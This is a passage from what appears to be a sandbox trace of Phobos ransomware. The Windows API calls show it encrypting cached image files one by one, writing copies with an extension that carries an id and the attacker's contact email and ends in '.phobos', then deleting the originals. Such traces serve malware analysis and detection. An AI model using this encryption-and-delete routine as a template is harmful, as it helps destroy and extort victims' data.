lpOverlapped=0x0) returned 1 [0181.235] CryptDestroyKey (hKey=0xa32d68) returned 1 [0181.235] CloseHandle (hObject=0x15c) returned 1 [0181.235] CloseHandle (hObject=0x180) returned 1 [0181.235] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\IKQEEPZR\\BBBLcCz[1].jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\ikqeepzr\\bbblccz[1].jpg")) returned 1 [0181.236] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2a0fb68 | out: pbBuffer=0x2a0fb68) returned 1 [0181.236] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\IKQEEPZR\\BBBLdzQ[1].jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\ikqeepzr\\bbbldzq[1].jpg"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x180 [0181.237] GetFileSizeEx (in: hFile=0x180, lpFileSize=0x2a0fb08 | out: lpFileSize=0x2a0fb08*=2322) returned 1 [0181.237] CloseHandle (hObject=0x180) returned 1 [0181.237] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\IKQEEPZR\\BBBLdzQ[1].jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\ikqeepzr\\bbbldzq[1].jpg")) returned 0x2020 [0181.237] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\IKQEEPZR\\BBBLdzQ[1].jpg.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\ikqeepzr\\bbbldzq[1].jpg.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0181.237] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\IKQEEPZR\\BBBLdzQ[1].jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\ikqeepzr\\bbbldzq[1].jpg"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x180 [0181.238] SetFilePointerEx (in: hFile=0x180, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2a0faa8 | out: lpNewFilePointer=0x0) returned 1 [0181.238] SetFilePointerEx (in: hFile=0x180, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2a0faa8 | out: lpNewFilePointer=0x0) returned 1 [0181.238] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\IKQEEPZR\\BBBLdzQ[1].jpg.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\ikqeepzr\\bbbldzq[1].jpg.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x15c [0181.238] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2a0fa60, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2a0fabc | out: phKey=0x2a0fabc*=0xa32d68) returned 1 [0181.238] CryptSetKeyParam (hKey=0xa32d68, dwParam=0x1, pbData=0x2a0fb68, dwFlags=0x0) returned 1 [0181.238] ReadFile (in: hFile=0x180, lpBuffer=0x3190020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2a0fae4, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesRead=0x2a0fae4*=0x912, lpOverlapped=0x0) returned 1 [0181.302] CryptEncrypt (in: hKey=0xa32d68, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x920, dwBufLen=0x920 | out: pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x920) returned 1 [0181.302] WriteFile (in: hFile=0x15c, lpBuffer=0x3190020*, nNumberOfBytesToWrite=0x920, lpNumberOfBytesWritten=0x2a0fac8, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesWritten=0x2a0fac8*=0x920, lpOverlapped=0x0) returned 1 [0181.434] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2a0fa54, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2a0fac0 | out: phKey=0x2a0fac0*=0xa32c28) returned 1 [0181.434] CryptSetKeyParam (hKey=0xa32c28, dwParam=0x1, pbData=0x2a0fb68, dwFlags=0x0) returned 1 [0181.449] CryptEncrypt (in: hKey=0xa32c28, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x40, dwBufLen=0x40 | out: pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x40) returned 1 [0181.449] CryptDestroyKey (hKey=0xa32c28) returned 1 [0181.449] WriteFile (in: hFile=0x15c, lpBuffer=0x3190020*, nNumberOfBytesToWrite=0xf2, lpNumberOfBytesWritten=0x2a0fac8, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesWritten=0x2a0fac8*=0xf2, lpOverlapped=0x0) returned 1 [0181.449] CryptDestroyKey (hKey=0xa32d68) returned 1 [0181.449] CloseHandle (hObject=0x180) returned 1 [0181.449] CloseHandle (hObject=0x15c) returned 1 [0181.449] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\IKQEEPZR\\BBBLdzQ[1].jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\ikqeepzr\\bbbldzq[1].jpg")) returned 1 [0181.450] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2a0fb68 | out: pbBuffer=0x2a0fb68) returned 1 [0181.450] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\IKQEEPZR\\BBBOmuh[1].jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\ikqeepzr\\bbbomuh[1].jpg"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x15c [0181.451] GetFileSizeEx (in: hFile=0x15c, lpFileSize=0x2a0fb08 | out: lpFileSize=0x2a0fb08*=1756) returned 1 [0181.451] CloseHandle (hObject=0x15c) returned 1 [0181.451] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\IKQEEPZR\\BBBOmuh[1].jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\ikqeepzr\\bbbomuh[1].jpg")) returned 0x2020 [0181.451] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\IKQEEPZR\\BBBOmuh[1].jpg.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\ikqeepzr\\bbbomuh[1].jpg.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0181.451] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\IKQEEPZR\\BBBOmuh[1].jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\ikqeepzr\\bbbomuh[1].jpg"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x15c [0181.451] SetFilePointerEx (in: hFile=0x15c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2a0faa8 | out: lpNewFilePointer=0x0) returned 1 [0181.452] SetFilePointerEx (in: hFile=0x15c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2a0faa8 | out: lpNewFilePointer=0x0) returned 1 [0181.452] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\IKQEEPZR\\BBBOmuh[1].jpg.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\ikqeepzr\\bbbomuh[1].jpg.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x180 [0181.452] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2a0fa60, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2a0fabc | out: phKey=0x2a0fabc*=0xa32d68) returned 1 [0181.452] CryptSetKeyParam (hKey=0xa32d68, dwParam=0x1, pbData=0x2a0fb68, dwFlags=0x0) returned 1 [0181.452] ReadFile (in: hFile=0x15c, lpBuffer=0x3190020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2a0fae4, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesRead=0x2a0fae4*=0x6dc, lpOverlapped=0x0) returned 1 [0181.509] CryptEncrypt (in: hKey=0xa32d68, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x6e0, dwBufLen=0x6e0 | out: pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x6e0) returned 1 [0181.509] WriteFile (in: hFile=0x180, lpBuffer=0x3190020*, nNumberOfBytesToWrite=0x6e0, lpNumberOfBytesWritten=0x2a0fac8, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesWritten=0x2a0fac8*=0x6e0, lpOverlapped=0x0) returned 1 [0181.510] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2a0fa54, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2a0fac0 | out: phKey=0x2a0fac0*=0xa32c28) returned 1 [0181.510] CryptSetKeyParam (hKey=0xa32c28, dwParam=0x1, pbData=0x2a0fb68, dwFlags=0x0) returned 1 [0181.510] CryptEncrypt (in: hKey=0xa32c28, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x40, dwBufLen=0x40 | out: pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x40) returned 1 [0181.510] CryptDestroyKey (hKey=0xa32c28) returned 1 [0181.510] WriteFile (in: hFile=0x180, lpBuffer=0x3190020*, nNumberOfBytesToWrite=0xf2, lpNumberOfBytesWritten=0x2a0fac8, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesWritten=0x2a0fac8*=0xf2, lpOverlapped=0x0) returned 1 [0181.510] CryptDestroyKey (hKey=0xa32d68) returned 1 [0181.510] CloseHandle (hObject=0x15c) returned 1 [0181.510] CloseHandle (hObject=0x180) returned 1 [0181.510] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\IKQEEPZR\\BBBOmuh[1].jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\ikqeepzr\\bbbomuh[1].jpg")) returned 1 [0181.511] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2a0fb68 | out: pbBuffer=0x2a0fb68) returned 1 [0181.511] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\IKQEEPZR\\BBBPMvJ[1].jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\ikqeepzr\\bbbpmvj[1].jpg"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x180 [0181.517] GetFileSizeEx (in: hFile=0x180, lpFileSize=0x2a0fb08 | out: lpFileSize=0x2a0fb08*=5780) returned 1 [0181.517] CloseHandle (hObject=0x180) returned 1 [0181.517] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\IKQEEPZR\\BBBPMvJ[1].jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\ikqeepzr\\bbbpmvj[1].jpg")) returned 0x2020 [0181.517] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\IKQEEPZR\\BBBPMvJ[1].jpg.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\ikqeepzr\\bbbpmvj[1].jpg.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0181.517] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\IKQEEPZR\\BBBPMvJ[1].jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\ikqeepzr\\bbbpmvj[1].jpg"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x180 [0181.517] SetFilePointerEx (in: hFile=0x180, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2a0faa8 | out: lpNewFilePointer=0x0) returned 1 [0181.517] SetFilePointerEx (in: hFile=0x180, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2a0faa8 | out: lpNewFilePointer=0x0) returned 1 [0181.517] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\IKQEEPZR\\BBBPMvJ[1].jpg.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\ikqeepzr\\bbbpmvj[1].jpg.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x15c [0181.518] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2a0fa60, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2a0fabc | out: phKey=0x2a0fabc*=0xa32d68) returned 1 [0181.518] CryptSetKeyParam (hKey=0xa32d68, dwParam=0x1, pbData=0x2a0fb68, dwFlags=0x0) returned 1 [0181.518] ReadFile (in: hFile=0x180, lpBuffer=0x3190020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2a0fae4, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesRead=0x2a0fae4*=0x1694, lpOverlapped=0x0) returned 1 [0181.759] CryptEncrypt (in: hKey=0xa32d68, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x16a0, dwBufLen=0x16a0 | out: pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x16a0) returned 1 [0181.759] WriteFile (in: hFile=0x15c, lpBuffer=0x3190020*, nNumberOfBytesToWrite=0x16a0, lpNumberOfBytesWritten=0x2a0fac8, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesWritten=0x2a0fac8*=0x16a0, lpOverlapped=0x0) returned 1 [0181.760] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2a0fa54, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2a0fac0 | out: phKey=0x2a0fac0*=0xa32ae8) returned 1 [0181.760] CryptSetKeyParam (hKey=0xa32ae8, dwParam=0x1, pbData=0x2a0fb68, dwFlags=0x0) returned 1 [0181.760] CryptEncrypt (in: hKey=0xa32ae8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x40, dwBufLen=0x40 | out: pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x40) returned 1 [0181.760] CryptDestroyKey (hKey=0xa32ae8) returned 1 [0181.760] WriteFile (in: hFile=0x15c, lpBuffer=0x3190020*, nNumberOfBytesToWrite=0xf2, lpNumberOfBytesWritten=0x2a0fac8, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesWritten=0x2a0fac8*=0xf2, lpOverlapped=0x0) returned 1 [0181.761] CryptDestroyKey (hKey=0xa32d68) returned 1 [0181.761] CloseHandle (hObject=0x180) returned 1 [0181.761] CloseHandle (hObject=0x15c) returned 1 [0181.761] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\IKQEEPZR\\BBBPMvJ[1].jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\ikqeepzr\\bbbpmvj[1].jpg")) returned 1 [0181.762] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2a0fb68 | out: pbBuffer=0x2a0fb68) returned 1 [0181.762] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\IKQEEPZR\\BBBUqkT[2].jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\ikqeepzr\\bbbuqkt[2].jpg"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x15c [0181.762] GetFileSizeEx (in: hFile=0x15c, lpFileSize=0x2a0fb08 | out: lpFileSize=0x2a0fb08*=2168) returned 1 [0181.762] CloseHandle (hObject=0x15c) returned 1 [0181.762] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\IKQEEPZR\\BBBUqkT[2].jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\ikqeepzr\\bbbuqkt[2].jpg")) returned 0x2020 [0181.762] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\IKQEEPZR\\BBBUqkT[2].jpg.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\ikqeepzr\\bbbuqkt[2].jpg.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0181.763] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\IKQEEPZR\\BBBUqkT[2].jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\ikqeepzr\\bbbuqkt[2].jpg"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x15c [0181.763] SetFilePointerEx (in: hFile=0x15c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2a0faa8 | out: lpNewFilePointer=0x0) returned 1 [0181.763] SetFilePointerEx (in: hFile=0x15c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2a0faa8 | out: lpNewFilePointer=0x0) returned 1 [0181.763] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\IKQEEPZR\\BBBUqkT[2].jpg.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\ikqeepzr\\bbbuqkt[2].jpg.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x180 [0181.829] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2a0fa60, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2a0fabc | out: phKey=0x2a0fabc*=0xa32d68) returned 1 [0181.829] CryptSetKeyParam (hKey=0xa32d68, dwParam=0x1, pbData=0x2a0fb68, dwFlags=0x0) returned 1 [0181.830] ReadFile (in: hFile=0x15c, lpBuffer=0x3190020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2a0fae4, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesRead=0x2a0fae4*=0x878, lpOverlapped=0x0) returned 1 [0181.890] CryptEncrypt (in: hKey=0xa32d68, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x880, dwBufLen=0x880 | out: pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x880) returned 1 [0181.891] WriteFile (in: hFile=0x180, lpBuffer=0x3190020*, nNumberOfBytesToWrite=0x880, lpNumberOfBytesWritten=0x2a0fac8, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesWritten=0x2a0fac8*=0x880, lpOverlapped=0x0) returned 1 [0181.891] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2a0fa54, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2a0fac0 | out: phKey=0x2a0fac0*=0xa32ae8) returned 1 [0181.891] CryptSetKeyParam (hKey=0xa32ae8, dwParam=0x1, pbData=0x2a0fb68, dwFlags=0x0) returned 1 [0181.891] CryptEncrypt (in: hKey=0xa32ae8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x40, dwBufLen=0x40 | out: pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x40) returned 1 [0181.891] CryptDestroyKey (hKey=0xa32ae8) returned 1 [0181.891] WriteFile (in: hFile=0x180, lpBuffer=0x3190020*, nNumberOfBytesToWrite=0xf2, lpNumberOfBytesWritten=0x2a0fac8, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesWritten=0x2a0fac8*=0xf2, lpOverlapped=0x0) returned 1 [0181.891] CryptDestroyKey (hKey=0xa32d68) returned 1 [0181.891] CloseHandle (hObject=0x15c) returned 1 [0181.892] CloseHandle (hObject=0x180) returned 1 [0181.892] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\IKQEEPZR\\BBBUqkT[2].jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\ikqeepzr\\bbbuqkt[2].jpg")) returned 1 [0181.892] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2a0fb68 | out: pbBuffer=0x2a0fb68) returned 1 [0181.892] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\IKQEEPZR\\BBBYfEH[1].jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\ikqeepzr\\bbbyfeh[1].jpg"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x180 [0181.893] GetFileSizeEx (in: hFile=0x180, lpFileSize=0x2a0fb08 | out: lpFileSize=0x2a0fb08*=6607) returned 1 [0181.893] CloseHandle (hObject=0x180) returned 1 [0181.893] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\IKQEEPZR\\BBBYfEH[1].jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\ikqeepzr\\bbbyfeh[1].jpg")) returned 0x2020 [0181.893] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\IKQEEPZR\\BBBYfEH[1].jpg.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\ikqeepzr\\bbbyfeh[1].jpg.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0181.893] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\IKQEEPZR\\BBBYfEH[1].jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\ikqeepzr\\bbbyfeh[1].jpg"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x180 [0181.893] SetFilePointerEx (in: hFile=0x180, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2a0faa8 | out: lpNewFilePointer=0x0) returned 1 [0181.893] SetFilePointerEx (in: hFile=0x180, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2a0faa8 | out: lpNewFilePointer=0x0) returned 1 [0181.893] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet 